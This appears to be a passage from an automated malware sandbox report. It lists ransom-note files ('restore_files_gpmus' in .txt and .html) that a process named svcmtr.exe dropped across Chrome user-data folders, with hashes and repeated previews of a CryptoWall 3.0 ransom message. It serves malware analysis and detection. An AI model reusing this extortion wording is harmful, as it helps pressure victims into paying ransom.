                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies\61\_metadata\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies\61\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies\61\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\InterventionPolicyDatabase\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\InterventionPolicyDatabase\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload\1.0.6.0\_metadata\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload\1.0.6.0\_metadata\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload\1.0.6.0\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
